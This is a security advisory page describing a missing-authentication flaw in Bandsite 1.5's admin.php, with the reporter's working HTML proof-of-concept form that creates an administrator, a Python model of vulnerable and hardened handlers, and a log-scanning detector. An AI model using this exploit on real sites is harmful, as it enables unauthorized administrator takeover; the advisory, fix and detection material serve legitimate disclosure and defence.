SecurityTracker.com
SecurityTracker Archives
Category:   Application (Forum/Board/Portal)  >   Bandsite
Vendors:   de Vos, Jelle
Bandsite Portal Software Authentication Flaw Lets Remote Users Add Administrators
SecurityTracker Alert ID:  1007690
SecurityTracker URL:  http://securitytracker.com/id/1007690
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 12 2003
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.5
Description:   Nasser.M.Sh reported a vulnerability in Bandsite. A remote user can gain administrative access to the application.

It is reported that the "admins" section of admin.php processes a POST request containing 'name' and 'pass' fields and creates an account with administrator privileges without requiring the requester to be logged in. A remote user can therefore submit a specially crafted POST request to the following URL to add an administrator account with credentials of their choosing, and then log in at login.php with those credentials:

http://[target]/bandwebsite/admin.php?&Login=1&section=admins

The report includes a proof of concept: a plain HTML form, hosted on any web site, that posts the two fields to that URL.

The vendor has reportedly been notified without response.

Impact:   A remote user can add administrative user accounts.
Solution:   No solution was available at the time of this entry.
Vendor URL:  membres.lycos.fr/fluxx/bandwebsite.php
Cause:   Authentication error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)
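The flaw in the terms a code reviewer would look for, as an added example that is not Bandsite's code (the product is PHP and none of its source appears on this page): a request handler that creates an administrator while deriving "is logged in" from nothing the server controls, beside a hardened form of the same handler. The request model, the account store and the handler names are hypothetical. Treating the `Login=1` flag from the exploit URL as the script's only check is an assumption made to give the flaw a concrete shape; the report does not say how the check fails. The hardened handler additionally requires an anti-CSRF token, because the report's attack page is a cross-site form post and a session check alone would still let it succeed from a logged-in administrator's browser.

```python
"""Missing authentication on an admin action, modelled in Python.

Added example, not Bandsite's code. It reproduces the pattern the advisory
describes: the "admins" section of admin.php accepts a POST carrying "name"
and "pass" and creates an administrator without checking that the requester
has logged in. Request, AdminStore and the handler names are hypothetical;
using the "Login=1" URL flag as the only gate is an assumption.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Request:
    """A minimal HTTP request. session is server-side state tied to the
    client's cookie; None means the client presented no valid session."""
    method: str
    path: str
    query: dict
    form: dict
    session: Optional[dict] = None


class AdminStore:
    """Administrator accounts with salted PBKDF2 password hashes."""

    def __init__(self) -> None:
        self.admins: dict = {}

    def add(self, name: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        self.admins[name] = (salt, digest)

    def verify(self, name: str, password: str) -> bool:
        if name not in self.admins:
            return False
        salt, digest = self.admins[name]
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return hmac.compare_digest(candidate, digest)


def handle_admins_vulnerable(req: Request, store: AdminStore) -> tuple:
    """Vulnerable shape (assumed): the only gate is a client-controlled URL
    flag, so anyone who can send a POST can create an administrator."""
    if (req.method == "POST" and req.query.get("Login") == "1"
            and req.query.get("section") == "admins"):
        store.add(req.form["name"], req.form["pass"])
        return 200, "The admin has been added!"
    return 400, "bad request"


def handle_admins_fixed(req: Request, store: AdminStore) -> tuple:
    """Hardened shape: authorization comes from server-side session state,
    the form must carry the per-session anti-CSRF token (the report's attack
    page is a cross-site form post), and the inputs are validated."""
    if req.method != "POST" or req.query.get("section") != "admins":
        return 400, "bad request"
    if not req.session or not req.session.get("is_admin"):
        return 403, "login required"
    token = req.form.get("csrf", "")
    if not token or not hmac.compare_digest(token, req.session.get("csrf", "")):
        return 403, "missing or invalid CSRF token"
    name = req.form.get("name", "").strip()
    password = req.form.get("pass", "")
    if not name or len(password) < 8 or name in store.admins:
        return 400, "invalid name or password"
    store.add(name, password)
    return 200, "admin added"


def demo() -> dict:
    """Replays the report's POST against both handlers; returns the outcomes."""
    attack = Request("POST", "/bandwebsite/admin.php",
                     {"Login": "1", "section": "admins"},
                     {"name": "nmsh", "pass": "nmsh"})
    vuln_store, fixed_store = AdminStore(), AdminStore()
    return {
        "vulnerable_status": handle_admins_vulnerable(attack, vuln_store)[0],
        "vulnerable_login_works": vuln_store.verify("nmsh", "nmsh"),
        "fixed_status": handle_admins_fixed(attack, fixed_store)[0],
        "fixed_admin_created": "nmsh" in fixed_store.admins,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the comparison is where the trust boundary sits: in the vulnerable shape every input the handler consults (the URL flag, the form fields) arrives from the client, so there is nothing for it to verify; in the hardened shape the decision rests on session state the server created at login and on a token the attacker's page cannot read.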

Message History:   None.
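Since no fix was available, a compensating check that a site operator could run over the web server's access log, as an added example that is not part of the advisory: report every POST that reaches the admins section of admin.php, and mark those whose Referer is absent or from another host, which is how a form hosted elsewhere, like the report's nmsh.htm, would appear. The log lines are constructed for the example in Apache combined format; the hosts band.example and attacker.example, the addresses and the function names are made up.

```python
"""Spotting administrator creation in web server logs.

Added example, not part of the advisory. Watches for the request the
exploit sends: a POST to admin.php whose query string selects the "admins"
section. The log lines are constructed in Apache combined format; hosts,
addresses and field names are made up for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a benign GET, the exploit POST from a page hosted
# elsewhere, a same-site admin POST, and an unrelated POST.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2003:03:40:01 -0700] "GET /bandwebsite/admin.php?section=admins HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2003:03:46:46 -0700] "POST /bandwebsite/admin.php?&Login=1&section=admins HTTP/1.1" 200 512 "http://attacker.example/nmsh.htm" "Mozilla/4.0"
203.0.113.5 - - [12/Sep/2003:04:01:12 -0700] "POST /bandwebsite/admin.php?section=admins HTTP/1.1" 200 512 "http://band.example/bandwebsite/admin.php?section=admins" "Mozilla/4.0"
198.51.100.7 - - [12/Sep/2003:04:02:30 -0700] "POST /bandwebsite/guestbook.php HTTP/1.1" 200 300 "http://band.example/bandwebsite/guestbook.php" "Mozilla/4.0"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str):
    """Split one combined-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs skips the empty pair produced by the leading "&" in the exploit URL
    rec["query"] = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    return rec


def find_admin_adds(log_text: str, site_host: str) -> list:
    """One finding per POST that reaches admin.php's admins section.

    cross_site is True when the Referer is absent or names another host,
    which is how a hosted attack page looks. A same-site Referer does not
    prove legitimacy (it is client-supplied), so every hit is reported."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] != "POST" or not rec["path"].endswith("/admin.php"):
            continue
        if rec["query"].get("section") != "admins":
            continue
        ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "status": int(rec["status"]),
            "cross_site": ref_host != site_host,
            "referer": rec["referer"],
        })
    return findings


if __name__ == "__main__":
    for f in find_admin_adds(SAMPLE_LOG, "band.example"):
        flag = "CROSS-SITE " if f["cross_site"] else ""
        print(f'{f["time"]} {f["ip"]} {flag}POST to admins section (HTTP {f["status"]})')
```

Any hit deserves a look, since adding an administrator is rare on a band site; the same-site hits are then reconciled against the administrators the site owner actually created. The check only sees what reached the script, so it belongs alongside, not instead of, restricting admin.php to trusted addresses or an extra web-server-level login until the application itself verifies the session.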


 Source Message Contents

Date:  Fri, 12 Sep 2003 03:46:46 -0700 (PDT)
Subject:  vulnerability in Bandsite Allows Gaining Admin Access.



Information:
°°°°°°°°°°°°
- Product: Bandsite portal system
- Website: http://membres.lycos.fr/fluxx/bandwebsite.php
- Author: Jelle de Vos
- Tested version: 1.5
- Problem: vulnerability in Bandsite allows gaining admin access.

Product Description:
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes
support, news posting, audio sections, guestbook, tour guide, an admin
section to manage overall data and configurations, and more.

Exploit:
°°°°°°°°°°
=====================   nmsh.htm    ==============================
<html>
<body>
<table cellspacing="1" cellpadding="5" width="570" bgcolor="#665E6B" border="0">
  <tbody>
  <tr><td bgcolor="#ffffff">
  <!-- Posts a chosen name/pass to the admins section of admin.php on the victim host [target] -->
  <form action="http://[target]/bandwebsite/admin.php?&Login=1&section=admins" method="post">
      Name:<br>
  <input type="text" name="name" value="nmsh" size="20"><br>
      Pass:<br>
  <input type="text" name="pass" value="nmsh" size="20"><br>
  <input type="submit" name="submit" value="send"><br>
  </form>
  </td></tr>
  </tbody>
</table>
</body>
</html>
=====================    nmsh.htm   ==============================
The admin has been added!
:(
Now go to this link:
http://[target]/bandwebsite/login.php
and log in as admin:
name: nmsh
pass: nmsh
Vendor:
°°°°°°°
Vendor has been contacted, no reply received.

Provided by:
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com

Copyright 2012, SecurityGlobal.net LLC